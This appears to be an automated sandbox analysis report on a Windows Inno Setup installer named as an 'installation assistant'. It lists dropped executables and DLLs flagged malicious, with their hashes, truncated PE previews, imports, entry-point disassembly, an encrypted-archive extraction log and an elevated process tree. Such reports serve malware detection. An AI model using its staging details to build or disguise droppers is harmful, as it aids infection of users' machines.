                            Preview:V.y.(.P.U..%...A{...&i.&..8.;...?....R.........*..o...r...*.r........F..~.5XoZ.4...$.. ..>n....[F..=.V...2M?.c.x..5...Y....".s.g.Y..F..3../Q.={!BO.Kz`.8\z...2.g..Z].ZY.};./.c..=.<Um{1...3.3(.....%4...a/.E3..5<..&..U.K;..yD5....d............g.;..8.......v?.Ib...v..J......W...?<.~w..&........c...H...R..vo.Da.3.H.".Y.8.q...B....l\R.D.L...J'G.... .f.K#..Q'.x.Wj....b..v...g..&.o@=.p..j.......h#.......r..!.....Ga.2..4.'f......{.a......D..m.i.+OiG...W.....B...>&..R_.(.ur.x..e....<.e...p.*....%..y4..j.....fP#....%.v.-..}...w......'. ..J.}..H..~!K.#..v4....EX.X3...>.o...0Hw^...t..X....+..S.F.5...E.la....d..R...D.-..hx6....'..PF....*).h....Qq..VU..~..Qi..c-.E.......V..c~N..X...OO.V.. H.....5U...[B.3..N?.0....#.....;.v....2.Y............f..A..v.Z.t:....n.v.UE.A.c.@.d..L.)...l...[....U.kw.B.l...S..E.......[..V..$C%..|KK..=..r..N*.t.G....&.].X.Q...:..k.........h..../N4...C$..t.V.x..t..p.......H@.....(.s8v..I...}`A...)f..%...._[.Z..#S.F..v|.I].....
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                            Malicious:false
                            Preview:@...e................................................@..........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564940970483
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:CC931C68EF6CB43932F2B21773072C73
                            SHA1:70E6A4F6482CC6006FF0F91A967FC5707B2F90C9
                            SHA-256:3707449B5CFF4A2360DA5BD55A06274C6F934B93BBEEFDF01956665DB3230AE0
                            SHA-512:924E79F925305B052B14D028EB26E9949F4188B293A35F6676BEED39D70CBF9CDBEE96F931FC44084CBB841416EDE807D465865EFCAA388D0C199573B32BEAA4
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564940970483
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:CC931C68EF6CB43932F2B21773072C73
                            SHA1:70E6A4F6482CC6006FF0F91A967FC5707B2F90C9
                            SHA-256:3707449B5CFF4A2360DA5BD55A06274C6F934B93BBEEFDF01956665DB3230AE0
                            SHA-512:924E79F925305B052B14D028EB26E9949F4188B293A35F6676BEED39D70CBF9CDBEE96F931FC44084CBB841416EDE807D465865EFCAA388D0C199573B32BEAA4
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.949167675813021
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File size:7'495'744 bytes
                            MD5:3dd1a269e502f7284674c54819e9ad8e
                            SHA1:f3764c08583b70e6427d8efe97e6daa1582de9a3
                            SHA256:9622e99ad30c7b5bef5ad85c34ea80a961f1d5d05dcc9a0083c3fa8a00966228
                            SHA512:392d4b57eadc20d7118954c3c9e44e80803cd0df05b9beecdab7219ba8a1826e0427748dec12b07c4179c444f526941399b606b79209393a08c16c1439256e05
                            SSDEEP:196608:l9Z1v6nEaCmoy2/qQAflhtvgG+Kay7DS2KI:lonELvy2/qRlhSG+Kx7DS2L
                            TLSH:C2762223F2CBD03EE05A1B3715B2A61494FB6A616523AD5296FCB4ECCF310601E3E657
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:0c0c2d33ceec80aa
                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007F0730464105h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007F07304F5A8Bh
                            call 00007F07304F55DEh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007F07304F02B8h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007F073045E1B3h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007F07304F15E3h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007F07304F5B13h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007F07304FC7FAh
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007F07304F1ED8h
                            mov edx, dword ptr [004B4200h]
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                            IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                            IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc | 0xcb000 | 0x11000 | 0x11000 | b2dcf14000a1dc7150e021c573503d26 | False | 0.1877154181985294 | data | 3.723301568529278 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                            RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                            RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                            RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                            RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                            RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                            RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                            RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                            RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                            RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                            RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                            RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                            RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                            RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                            RT_STRING | 0xd8e00 | 0x3f8 | data | - | - | 0.3198818897637795
                            RT_STRING | 0xd91f8 | 0x2dc | data | - | - | 0.36475409836065575
                            RT_STRING | 0xd94d4 | 0x430 | data | - | - | 0.40578358208955223
                            RT_STRING | 0xd9904 | 0x44c | data | - | - | 0.38636363636363635
                            RT_STRING | 0xd9d50 | 0x2d4 | data | - | - | 0.39226519337016574
                            RT_STRING | 0xda024 | 0xb8 | data | - | - | 0.6467391304347826
                            RT_STRING | 0xda0dc | 0x9c | data | - | - | 0.6410256410256411
                            RT_STRING | 0xda178 | 0x374 | data | - | - | 0.4230769230769231
                            RT_STRING | 0xda4ec | 0x398 | data | - | - | 0.3358695652173913
                            RT_STRING | 0xda884 | 0x368 | data | - | - | 0.3795871559633027
                            RT_STRING | 0xdabec | 0x2a4 | data | - | - | 0.4275147928994083
                            RT_RCDATA | 0xdae90 | 0x10 | data | - | - | 1.5
                            RT_RCDATA | 0xdaea0 | 0x310 | data | - | - | 0.6173469387755102
                            RT_RCDATA | 0xdb1b0 | 0x2c | data | - | - | 1.2045454545454546
                            RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                            RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2769121813031161
                            RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                            DLL | Imports
                            kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                            comctl32.dll | InitCommonControls
                            user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                            oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                            advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                            Name | Ordinal | Address
                            __dbk_fcall_wrapper | 2 | 0x40fc10
                            dbkFCallWrapperAddr | 1 | 0x4b063c
                            Language of compilation system | Country where language is spoken
                            English | United States
                            No network behavior found

                            Target ID:0
                            Start time:22:52:55
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
                            Imagebase:0x420000
                            File size:7'495'744 bytes
                            MD5 hash:3DD1A269E502F7284674C54819E9AD8E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:22:52:55
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
                            Imagebase:0x250000
                            File size:3'366'912 bytes
                            MD5 hash:CC931C68EF6CB43932F2B21773072C73
                            Has elevated privileges:true
                            Has administrator privileges:true
